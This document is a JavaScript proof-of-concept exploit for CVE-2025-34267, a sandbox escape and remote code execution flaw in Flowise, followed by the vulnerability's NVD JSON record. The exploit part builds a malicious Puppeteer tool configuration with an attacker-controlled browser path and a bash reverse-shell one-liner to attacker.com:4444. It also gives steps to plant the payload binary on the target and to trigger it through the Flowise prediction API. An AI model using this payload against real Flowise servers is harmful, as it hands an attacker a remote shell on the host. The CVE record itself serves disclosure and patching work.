CVE-2025-34267

// PoC for CVE-2025-34267 - Flowise RCE via Puppeteer/Playwright Sandbox Escape // Prerequisites: // 1. Valid low-privilege credentials to Flowise instance // 2. ALLOW_BUILTIN_DEP environment variable must be enabled // 3. Ability to create/modify a tool that uses Puppeteer or Playwright // Step 1: Create a malicious tool configuration in Flowise // The attacker crafts a tool node that invokes Puppeteer with attacker-controlled // executablePath and args parameters to escape the nodevm sandbox. const maliciousToolConfig = { name: "BrowserAutomation", type: "Puppeteer", // Attacker-controlled browser binary path - points to a malicious script executablePath: "/tmp/malicious_binary", // Malicious arguments that will be passed to the binary args: [ "--no-sandbox", "--disable-setuid-sandbox", // Reverse shell payload as argument "/bin/bash", "-c", "bash -i >& /dev/tcp/attacker.com/4444 0>&1" ], headless: false, // Additional options to ensure execution options: { dumpio: true, pipe: true } }; // Step 2: The malicious binary that will be executed on the host // Save this as /tmp/malicious_binary and chmod +x it // #!/bin/bash // bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' // Step 3: Trigger the tool execution via Flowise API // POST /api/v1/prediction/{chatflowid} const exploitRequest = { question: "Execute browser automation", overrideConfig: { customTool: maliciousToolConfig } }; // When Flowise processes this tool, Puppeteer will attempt to launch // the attacker-controlled executablePath, executing arbitrary code // on the host system, completely bypassing the nodevm sandbox. console.log("Exploit payload prepared. Send exploitRequest to Flowise API endpoint."); console.log("Ensure /tmp/malicious_binary exists on target with reverse shell payload."); console.log("Listen on attacker.com:4444 for incoming shell connection.");

{"cve": {"id": "CVE-2025-34267", "sourceIdentifier": "[email protected]", "published": "2025-10-14T20:15:34.147", "lastModified": "2025-10-27T19:12:43.167", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flowise v3.0.1 < 3.0.8 and all versions after with 'ALLOW_BUILTIN_DEP' enabled contain an authenticated remote code execution vulnerability and node VM sandbox escape due to insecure use of integrated modules (Puppeteer and Playwright) within the nodevm execution environment. An authenticated attacker able to create or run a tool that leverages Puppeteer/Playwright can specify attacker-controlled browser binary paths and parameters. When the tool executes, the attacker-controlled executable/parameters are run on the host and circumvent the intended nodevm sandbox restrictions, resulting in execution of arbitrary code in the context of the host. This vulnerability was incorrectly assigned as a duplicate CVE-2025-26319 by the developers and should be considered distinct from that identifier."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.1", "versionEndExcluding": "3.0.8", "matchCriteriaId": "D55061AC-1335-49A7-9E2D-448EE268DB95"}]}]}], "references": [{"url": "https://flowiseai.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/FlowiseAI/Flowise/pull/5231", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5w3r-f6gm-c25w", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/flowise-auth-command-execution-and-sandbox-bypass-via-puppeteer-and-playwright-packages", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}